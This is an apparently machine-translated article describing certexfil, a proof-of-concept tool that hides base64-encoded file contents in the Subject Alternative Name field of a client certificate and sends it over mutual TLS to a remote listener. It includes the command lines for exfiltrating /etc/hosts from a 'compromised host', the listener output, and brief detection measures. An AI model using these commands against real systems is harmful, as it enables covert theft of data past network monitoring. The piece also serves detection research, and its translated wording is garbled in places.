Shulou(Shulou.com)06/02 Report--

This article mainly introduces how to use x509 digital certificate to achieve data penetration, the article is very detailed, has a certain reference value, interested friends must read it!

Data leaks may be a major target for insiders and hackers. Therefore, you need to think about how to send this data.

I find that most companies have little protection against this problem (for example, man-in-the-middle agents and TLS interception), and testing is usually pitifully low. But sometimes it can be a challenge.

For my work and hobbies, I write a lot of tools around data obfuscation and covert channels, and I always try to build better security detection and improve response time.

In this article, we will discuss how to embed data in a custom SSL certificate and use it through mTLS for a remote listening service.

This is written as POC, and it is also my first program in Go.

From TLS to mTLS?

TLS (secure Transport layer Protocol) is an encryption protocol used to provide communication security between the client and the server. To do this, the certification authority ("CA") issues a signing certificate to the server to prove its identity to the client. The client can check the certificate and see if the signed CA is really trusted.

Although TLS primarily authenticates the server, Mutual TLS adds client authentication, which is provided by a trusted CA with a signing certificate.

X509 certificate abuse

X509 certificates can be extended using subject aliases or SAN.

This means that we can add literal values during certificate creation, which can be anything from email to IP to the DNS name.

Again, you can add anything to this SAN, and there is no real validation here, just using the format DNS: (. *).

So, can we hide a piece of our payload code in this location? That is DNS: base64 (content).

Certexfil

It has three modes:

Use-ca to create a CA schema that is used by both the client and the listener

Using-listen, start a mTLS listener (you need a CA file from-ca)

Using-payload and-host, inject payload (file, stdout) into the custom client certificate, and then use it to connect to the listening service immediately.

The code can be found here: https://github.com/sourcefrenchy/certexfil

Certexfil encrypted payload

I used a simple coding module to base64 payload, but it didn't seem to be of much use at this stage. Obviously, I need to do some encryption at some point, or I should rename it to encodepayload:). To do this, I created a module cryptopayload in go to encrypt payload.

The code can be found here: https://github.com/sourcefrenchy/cryptopayload

Usage

Create a CA/ server certificate

This will create a. / CERTS directory that contains server_cert.pem and server_key.pem certificates for mTLS (these directories will be used by clients and snooping mode:

Somewhere$ certexfil-ca-ecdsa-curve P521-host remote.server.com

Now, make sure you have the certexfil binaries and the created. / CERTS directory on your remote server. Then, start snooping (default: all interfaces, tcp/8443)

Remoteserver$. / certexfil-listen

Client / compromised host sends payload

In this example, we try to data leak our "/ etc/hosts" file by generating a custom certificate and establishing a mTLS connection to the remote listener, all with the following line of command:

06:52:14 jma@wintermute Go-Workspace → certexfil-- host remote.server.com-- payload / etc/hosts2019/05/31 18:52:23 [*] Reading from file..2019/05/31 18:52:24 [D] Payload (raw)-- > 127.0.0.1. (225bytes) 18:52:24 on 2019-05-31 [D] Payload (Prepare ())-- > raw... (173bytes) 18:52:24 on 2019-05-31 [*] Generated custom cert with payloadOo

We can check the new certificate created (client_cert.pem) and the added payload (base64) in the SAN area locally. Let's use openssl to check again:

$openssl x509-in. / CERTS/client_cert.pem-text-noout grep-A 5 "Subject Alternative Name" X509v3 Subject Alternative Name: DNS:x.io.net DNS:H4sIAAAAAAAC/0TNMa7DIAwG4DmcwtKbH4IMqcQNunXoBQgxDaoDCJOmx69o08abP1v/r/uTVFJJ3VFylubEVXxMS91tIVYsy1pRiD+4zgg+EaUtxBtQiMhgC8KEHIodqV0LnC+PAZzNb2h6LIzR0Cbk4f9Xs28pj9bdhUeljFHHS8QqvD9wcZZrLujDs3nfMptbopgm5B37L5a0ViwsXgEAAP//pJPCNuEAAAA= Signature Algorithm: ecdsa-with-SHA512 30:81:88:02:42:01:aa:73:a9:af:03:4f:21:16:dd:62:4a:af: 59:6b:89:f5:a6:6d:e6:f1:21:40:ff:c8:32:f7:99:4f:d9:c8: 7f:b3:ac:43:1f:71:09:86 : f4:be:7b:af:93:31:e2:fb:ec:e8:

Retrieve the payload on the listening end

After verifying the certificate provided by the client connection, we can retrieve the payload, decode it from the base64 and display it:

○ →. / certexfil-- listen2019/05/31 22:51:01 [*] Starting listener..2019/05/31 22:52:24 [*] Payload received: H4sIAAAAAAAC/0TNMa7DIAwG4DmcwtKbH4IMqcQNunXoBQgxDaoDCJOmx69o08abP1v/r/uTVFJJ3VFylubEVXxMS91tIVYsy1pRiD+4zgg+EaUtxBtQiMhgC8KEHIodqV0LnC+PAZzNb2h6LIzR0Cbk4f9Xs28pj9bdhUeljFHHS8QqvD9wcZZrLujDs3nfMptbopgm5B37L5a0ViwsXgEAAP//pJPCNuEAAAA=2019/05/31 22:52:24 [*] Payload decoded: 127.0.0.1 localhost127.0.1.1 wintermute# The following lines are desirable for IPv6 capable hosts::1 ip6-localhost ip6-loopbackfe00::0 ip6-localnetff00::0 ip6-mcastprefixff02 :: 1 ip6-allnodesff02::2 ip6-allrouters limit

The handshake message length of tls: is 1399109 bytes, which exceeds the maximum of 65536 bytes.

OpenSSL does not allow certificates with a size greater than 65536 bytes

TODO: split a large payload into multiple certificates and / or recompile OpenSSL

Mitigation measures

Suppose you have intercepted and analyzed some ideas on SSL traffic:)

Detect the newly created TLS certificate

Check for large DNS certificates or check SAN for valid TLS entries (for example, you can use some BroIDS scripts)

Properly configure Man-in-the-Middle proxy / firewall to block TLS traffic

The above is all the contents of the article "how to use x509 digital certificate to achieve data penetration". Thank you for reading! Hope to share the content to help you, more related knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.